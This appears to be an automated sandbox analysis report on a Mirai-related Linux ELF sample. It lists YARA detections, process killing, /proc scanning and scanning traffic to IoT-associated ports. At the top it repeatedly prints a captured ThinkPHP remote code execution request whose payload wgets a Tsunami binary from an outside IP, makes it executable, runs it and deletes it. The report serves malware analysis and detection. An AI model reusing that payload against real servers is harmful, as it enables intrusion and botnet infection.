    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0

    System Summary

    barindex
    Source: 6230.1.000000003d1482af.00000000e83cf7de.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
    Source: 6234.1.000000003d1482af.00000000e83cf7de.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 936, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 720, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 759, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 761, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 788, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 797, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 799, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 800, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 847, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 884, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 1334, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 1335, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 1389, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 1633, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 1809, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 1860, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 1872, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 1983, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 2048, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 2069, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 2096, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 2097, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 2102, result: successful
    Source: LOAD without section mappingsProgram segment: 0x8000
    Source: pjT3uuMrF1, type: SAMPLEMatched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4
    Source: 6234.1.0000000031c29fda.00000000517a471f.rw-.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), score = , modified = 2022-05-13
    Source: 6230.1.0000000031c29fda.00000000517a471f.rw-.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), score = , modified = 2022-05-13
    Source: 6230.1.000000003d1482af.00000000e83cf7de.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), score = , modified = 2022-05-13
    Source: 6230.1.000000003d1482af.00000000e83cf7de.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
    Source: 6234.1.000000003d1482af.00000000e83cf7de.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), score = , modified = 2022-05-13
    Source: 6234.1.000000003d1482af.00000000e83cf7de.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 936, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 720, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 759, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 761, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 788, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 797, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 799, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 800, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 847, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 884, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 1334, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 1335, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 1389, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 1633, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 1809, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 1860, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 1872, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 1983, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 2048, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 2069, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 2096, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 2097, result: successful
    Source: /tmp/pjT3uuMrF1 (PID: 6248)SIGKILL sent: pid: 2102, result: successful
    Source: classification engineClassification label: mal92.spre.troj.evad.lin@0/0@0/0

    Data Obfuscation

    barindex
    Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
    Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
    Source: initial sampleString containing UPX found: $Id: UPX 3.94 Copyright (C) 1996-2017 the UPX Team. All Rights Reserved. $
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1582/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/2033/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1612/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1579/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1699/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1335/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1698/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/2028/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1334/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1576/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/2025/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/910/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/912/fd
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/912/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/759/fd
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/759/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/517/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/918/fd
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/918/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1594/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1349/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1/fd
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1623/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/761/fd
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/761/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1622/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/884/fd
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/884/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1983/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/2038/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1344/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1465/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1586/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1860/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1463/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/800/fd
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/800/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/801/fd
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/801/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1629/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1627/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1900/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/491/fd
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/491/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/2050/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1877/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/772/fd
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/772/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1633/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1599/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1632/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/774/fd
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/774/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1477/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/654/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/896/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1476/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1872/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/2048/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/655/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1475/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/777/fd
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/777/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/656/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/657/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/658/fd
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/658/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/936/fd
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/936/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/419/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1639/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1638/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1809/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1494/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1890/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/2063/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/2062/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1888/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1886/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/420/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1489/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/785/fd
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/785/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1642/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/667/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/788/fd
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/788/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/789/fd
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/789/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1648/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/2078/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/2077/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/2074/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/670/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/793/fd
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/793/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1656/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1654/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/674/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/1532/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/675/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/796/fd
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/796/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/676/exe
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/797/fd
    Source: /tmp/pjT3uuMrF1 (PID: 6248)File opened: /proc/797/exe
    Source: /usr/bin/xfce4-session (PID: 6317)Rm executable: /usr/bin/rm -> rm -f /home/saturnino/.cache/sessions/Thunar-2ec9153f1-6fa0-4067-96b1-e5fe875b1e51

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: unknownNetwork traffic detected: HTTP traffic on port 41558 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58786 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 39286 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55154 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 55154
    Source: unknownNetwork traffic detected: HTTP traffic on port 51970 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 37458 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 37462 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 33210 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 38216 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 38216 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 38216 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 38248 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38216 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 44770 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 39484 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 33718 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53770 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 33718 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 38248 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 34712 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43396 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 44770 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 43396
    Source: unknownNetwork traffic detected: HTTP traffic on port 57792 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 33718 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53770 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 38248 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44770 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 45458 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 50746 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53270 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 56188 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53770 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 45458
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 53270
    Source: unknownNetwork traffic detected: HTTP traffic on port 33718 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 56188 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 56188 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 47180 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 56188 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53770 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 44770 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 38248 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59008 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 51174 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40090 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 52538 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 51174
    Source: unknownNetwork traffic detected: HTTP traffic on port 58338 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58338 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53844 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 44770 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53770 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58338 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 38248 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35864 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40842 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 56360 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58338 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35938 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58068 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33140 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33140 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 51098 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43860 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35494 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 51098
    Source: unknownNetwork traffic detected: HTTP traffic on port 43860 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35494 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43860 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35494 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 33140 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58338 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43860 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35494 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58068 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53770 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 44770 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 32864 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 52616 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49352 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 60084 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54388 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49422 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 60084
    Source: unknownNetwork traffic detected: HTTP traffic on port 33140 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49422 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49422 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49422 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 38248 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52408 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49528 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 49528
    Source: unknownNetwork traffic detected: HTTP traffic on port 58068 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33140 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44762 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49426 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 39812 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 36640 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 46568 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 36640 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 47034 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55086 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58338 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55086 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 33590 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 36640 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35796 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46568 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55086 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 46568 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 36640 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55086 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 60136 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58068 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 38672 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40510 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40742 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46568 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40742 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55974 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 55974
